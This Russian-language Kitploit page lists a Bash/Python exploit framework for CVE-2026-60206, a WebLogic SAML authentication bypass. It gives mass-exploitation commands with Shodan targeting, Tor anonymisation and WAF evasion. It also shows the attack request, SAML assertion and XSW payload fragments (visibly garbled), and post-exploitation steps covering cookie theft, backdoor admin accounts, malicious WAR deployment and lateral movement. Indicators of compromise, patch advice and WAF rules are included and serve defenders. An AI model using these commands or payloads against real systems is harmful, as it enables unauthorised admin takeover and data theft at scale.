Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-60206-PoC-Exploit — 👾 CVE-2026-60206 — Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Версии для Bash и Python. Возможности: --detect безопасная проверка, --exploit combo/unsigned/xsw/nameid/all, интеграция с --shodan, поддержка --tor, массовое сканирование, вывод в JSON/CSV/JSONL, проверка cookie. 🛡️ CVSS 9.9 Критический — Используйте этично, оставайтесь в рамках закона. 🔒 | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-60206-poc-exploit
Аутентификация и авторизацияФреймворки для эксплойтовГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияОбход WAF

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Тестирование на Проникновение
Red Teaming
GitHubtc4dy/cve-2026-60206-poc-exploit

CVE-2026-60206-PoC-Exploit

Репозиторий
4231 месяц назадЕщё не проверено

Описание

👾 CVE-2026-60206 — Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Версии для Bash и Python. Возможности: --detect безопасная проверка, --exploit combo/unsigned/xsw/nameid/all, интеграция с --shodan, поддержка --tor, массовое сканирование, вывод в JSON/CSV/JSONL, проверка cookie. 🛡️ CVSS 9.9 Критический — Используйте этично, оставайтесь в рамках закона. 🔒

Поделиться

CVE-2026-60206

CVE-2026-60206 — эксплойт-фреймворк (инструментарий) для обхода SAML-аутентификации Oracle WebLogic

CVE-2026-60206 CVSS 9.9 CISA KEV Python 3.6+

Pre-Auth Bypass SAML Injection Admin Access Cross-Platform

Oracle WebLogic Server — обход SAML-аутентификации → захват учётной записи администратора

Эксплойт-фреймворк и массовый сканер
Только для авторизованного тестирования безопасности.


⚖️ Правовой дисклеймер и ответственное использование

Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение.

Авторы и участники не несут ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Пользователи несут единоличную ответственность за получение явного письменного разрешения от владельца цели перед тестированием. Несанкционированный доступ к компьютерным системам незаконен в соответствии с Computer Fraud and Abuse Act (CFAA) и аналогичными законами по всему миру.

Используя данное программное обеспечение, вы соглашаетесь со следующим:

  • Использовать его только на системах, которые вам принадлежат или на тестирование которых у вас есть явное разрешение.
  • Соблюдать все применимые местные, государственные и федеральные законы.
  • Не использовать его в любых вредоносных, разрушительных или незаконных целях.

⚠️ ВНИМАНИЕ: Эта уязвимость активно эксплуатируется в реальных атаках. Несанкционированное использование может привести к серьёзным правовым последствиям.


[+!] Обзор уязвимости

CVE-2026-60206 — это критическая уязвимость неаутентифицированного обхода аутентификации в реализации SAML (Security Assertion Markup Language) в Oracle WebLogic Server. Она позволяет удалённым злоумышленникам обойти SAML-аутентификацию и получить административный доступ к консоли WebLogic без действительных учётных данных.

Как это работает:

  1. SAML-инъекция: уязвимость возникает из-за некорректной проверки SAML-утверждений. Злоумышленники могут создавать вредоносные SAML-ответы, обходящие проверки аутентификации.

  2. Обход подписи: уязвимость позволяет обойти проверку XML-подписи с помощью атак XML Signature Wrapping (XSW), когда злоумышленники оборачивают вредоносные утверждения легитимными подписями.

  3. Манипуляция NameID: злоумышленники могут внедрять комментарии или изменять поле NameID, чтобы выдать себя за привилегированных пользователей.

  4. Административный доступ: успешная эксплуатация предоставляет злоумышленнику административный доступ к консоли WebLogic Server с полным контролем.

Ключевые факты:


🛠️ Эксплойт-фреймворк

Полноценный учебный мультиэксплойт объединяет несколько векторов SAML-атак для обхода аутентификации и предоставляет расширенные возможности массового сканирования, перехвата cookie и административного доступа.

✨ Возможности

Векторы атаки


🕵️ Безопасный верификатор (--detect)

Безопасный верификатор выполняет неинтрузивное обнаружение уязвимости без выполнения вредоносных нагрузок и внесения изменений в систему.

✨ Возможности


📦 Установка и требования

Предварительные требования

  • Python 3.6+ или Bash 3.2+
  • curl (для Bash-версии)
  • pip (для библиотеки requests, Python-версия)

Установка зависимостей

root@kitploit:~
# Python version
pip install requests urllib3

# Optional: Shodan support
pip install shodan

# Bash version: curl only (no additional dependencies)

[!NOTE] Bash-версия работает только с curl и не имеет внешних зависимостей. Python-версия требует requests и urllib3 (опционально: shodan для интеграции с Shodan).


🚀 Примеры использования

[1] Python-эксплойт-фреймворк (exploit.py)

root@kitploit:~
# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin

# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v

# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json

# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv

# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit

# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20

# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl

# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json

# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0

# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify

# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v

[2] Bash-эксплойт-фреймворк (exploit.sh)

root@kitploit:~
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin

# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json

# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20

# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json

# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl

# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify

# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json

# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v

[3] Базовый валидатор (verifier_poc.sh)

root@kitploit:~
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin

# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt

# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify

# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080

🎯 Затронутые версии

⚠️ Важно: Эта уязвимость затрагивает самостоятельно размещённые (self-hosted) развёртывания WebLogic Server. Немедленно примените Oracle CPU за июль 2026 года.


🧠 Технический разбор

1. Обход SAML-аутентификации

Уязвимость позволяет злоумышленникам обойти SAML-аутентификацию, создавая вредоносные SAML-ответы, которые некорректно проверяются реализацией SAML в WebLogic.

Уязвимый эндпоинт:

root@kitploit:~
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded

SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/

2. Векторы атаки

Неподписанное утверждение

saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>

</saml2:Assertion>

XML Signature Wrapping (XSW)

ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>

<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>

Инъекция комментариев в NameID

<saml2:NameID Format="...">

lowpriv

</saml2:NameID>

3. Постэксплуатация

Кража cookie

Успешная эксплуатация даёт cookie JSESSIONID, предоставляющую административный доступ к консоли WebLogic.

Перехват сессии

Похищенная cookie может использоваться для доступа:

  • Консоль администрирования WebLogic
  • Развёртывание и удаление приложений
  • Доступ к ресурсам JNDI
  • Выполнение произвольных команд через JMX

Закрепление

  • Развёртывание вредоносных приложений (WAR-файлы)
  • Создание пользователей-бэкдоров с правами администратора
  • Установка инструментов удалённого доступа

Горизонтальное перемещение

  • Доступ к другим серверам в сети с использованием похищенных учётных данных
  • Эксплуатация доверительных отношений между WebLogic и другими системами
  • Переход (pivot) во внутренние сети

🔍 Индикаторы компрометации (IoCs)

Анализ журналов

Проверьте журналы WebLogic на предмет:

  • access.log — запросы к /saml2/sp/acs, /saml2/acs с необычными SAML-параметрами
  • domain.log — попытки обхода аутентификации с недействительными SAML-утверждениями
  • diagnostic.log — ошибки разбора SAML или сбои проверки подписи

Подозрительные запросы

  • Параметры SAMLResponse, содержащие:
    • Несколько тегов <saml2:Assertion>
    • Комментарии в полях <saml2:NameID>
    • Неподписанные утверждения
    • Вредоносный XML в кодировке Base64
    • javascript: или eval() в параметрах

Файлы

  • Неожиданные файлы сессий во временных каталогах WebLogic
  • Изменённые файлы конфигурации (config.xml, jps-config.xml)
  • Новые WAR-файлы в каталоге autodeploy
  • Изменённые файлы weblogic.security

Сеть

  • Несанкционированные административные подключения к консоли WebLogic
  • Необычные сканирования портов, нацеленные на SAML-эндпоинты
  • Исходящие подключения с сервера WebLogic к неизвестным IP-адресам
  • Подключения reverse shell на необычных портах

Процессы

  • Неожиданные Java-процессы
  • Процессы оболочки, порождённые из WebLogic
  • Сетевые подключения от пользователя WebLogic к внешним хостам

🛡️ Смягчение и устранение последствий

Немедленные действия

  1. Немедленно установите Oracle CPU за июль 2026 года
  2. Отключите SAML, если он активно не используется
  3. Отслеживайте SAML-эндпоинты на предмет подозрительной активности
  4. Просматривайте журналы доступа на предмет попыток эксплуатации
  5. Смените все учётные данные на затронутых системах

Долгосрочные меры

  1. Внедрите правила WAF для блокировки вредоносных SAML-запросов
  2. Включите строгий режим проверки подписи SAML
  3. Проводите регулярные аудиты безопасности конфигураций WebLogic
  4. Сегментация сети для ограничения доступа к WebLogic
  5. Внедрите SIEM-мониторинг событий WebLogic

Правила WAF

root@kitploit:~
# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10001,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Multiple SAML Assertions',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"

# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10002,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - NameID Comments',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"

# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10003,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Unsigned Assertion',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"

📚 Ссылки

  • NVD — CVE-2026-60206
  • Консультация Oracle Critical Patch Update — июль 2026
  • Каталог CISA KEV
  • SecurityFocus — CVE-2026-60206
  • The Hacker News — эксплуатируемая 0-day-уязвимость WebLogic

🔗 Другие эксплойты

  • CVE-2026-15409/15410 — эксплойт-фреймворк для SonicWall SMA1000
  • CVE-2026-6875 — эксплойт-фреймворк для Pre-Auth RCE в ServiceNow
  • CVE-2026-41091 — SolarFlare (RedSun) LPE в Microsoft Defender
  • CVE-2026-57821 — инструментарий для SQL-инъекций в Apache Fineract
  • CVE-2026-41940 — обход аутентификации в cPanel/WHM
Скачать инструмент
АтрибутЗначение
📅 ОбнаруженаИюль 2026 (Oracle CPU)
⚠️ Оценка CVSS9.9 (КРИТИЧЕСКАЯ)
📋 CISA KEVДобавлена 21 июля 2026 г.
🎯 Затронутые продуктыOracle WebLogic Server (Fusion Middleware)
🔄 Исправлено вOracle CPU, июль 2026
🔓 АутентификацияНе требуется (Pre-Auth)
🌍 Активная эксплуатацияПодтверждена в реальных атаках (июль 2026)
ВозможностьОписание
🚀 Мультивекторный эксплойт7 векторов атаки: unsigned, xsw_v1-4, nameid, combo
💻 Массовое сканированиеПараллельное сканирование с пулом потоков (Python) / FIFO (Bash)
🔐 Кража cookieПохищает JSESSIONID для перехвата сессии
👑 Доступ к консоли администратораПолный административный доступ к консоли WebLogic
📁 Определение версииОпределяет версии WebLogic и статус уязвимости
🌐 Пакетное сканированиеМассовая эксплуатация нескольких целей с многопоточностью
🎯 Безопасное обнаружениеОпциональный флаг --detect для неинтрузивной проверки уязвимости
🧩 Интеграция с ShodanЗагрузка целей прямо из поиска Shodan
🔍 Поддержка TorАнонимизация сканирования через прокси Tor
📊 Несколько форматов выводаПотоковый вывод в JSON, CSV, JSONL
🪟 КроссплатформенностьПоддержка Linux, macOS, BSD, Alpine, WSL
🔒 ПотокобезопасностьИспользует механизмы блокировки для параллельных операций
📋 Автосохранение сессийСохраняет полученные cookie для последующего использования
⚙️ Обход WAFРотация User-Agent и случайные задержки
ВекторОписание
unsignedНеаутентифицированное SAML-утверждение без подписи
xsw_v1XML Signature Wrapping — несколько утверждений
xsw_v2XSW — обход конвертной подписи
xsw_v3XSW — манипуляция пространствами имён
xsw_v4XSW — инъекция нескольких утверждений
nameidИнъекция комментариев в NameID
comboКомбинированная атака (unsigned + XSW + NameID)
ВозможностьОписание
🔍 Обнаружение WebLogicОпределяет экземпляры WebLogic через LoginForm.jsp
📊 Определение версииОпределяет конкретные версии WebLogic и уровни исправлений
🧪 Обнаружение SAML-эндпоинтовПроверяет наличие SAML ACS-эндпоинтов
🔒 НеинтрузивностьТолько определяет уязвимые версии
📋 Вывод в JSON/CSVЭкспорт результатов для отчётов
🔄 Массовое сканированиеСканирование нескольких целей с поддержкой потоков
Версия Oracle WebLogicСтатус
12.2.1.4.0🔴 УЯЗВИМА
14.1.1.0.0🔴 УЯЗВИМА
14.1.2.0.0🔴 УЯЗВИМА
15.1.1.0.0🔴 УЯЗВИМА
Другие версииПроверьте Oracle CPU за июль 2026